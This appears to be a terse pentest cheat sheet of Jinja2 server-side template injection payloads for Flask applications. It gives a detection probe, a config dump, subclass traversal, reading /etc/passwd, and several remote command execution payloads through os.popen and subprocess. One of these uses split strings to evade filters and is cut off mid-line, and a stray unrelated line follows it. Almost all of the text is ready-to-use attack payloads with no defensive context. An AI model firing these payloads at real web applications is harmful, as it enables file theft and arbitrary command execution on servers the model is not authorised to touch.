Python - Flask #Checking for Vuln print(render_template_string("{{4*6}}")) #List Items {{config.items()}} #Slecting a class {{5000.__class__.mro()}} #Listing Sub Classes {{5000.__class__.__mro__[1].__subclasses__()}} {{ ''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')() }} #Read Files {{5000.__class__.__mro__[1].__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read()}} #RCE - Use any 1 from below {{5000.__class__.__mro__[1].__subclasses__()[364]('whoami',shell=True,stdout=-1).communicate()}} {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} print(''.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__['__buil'+'tins__']['ev'+'al']('__imp'+'ort__("o...
Way to Divergence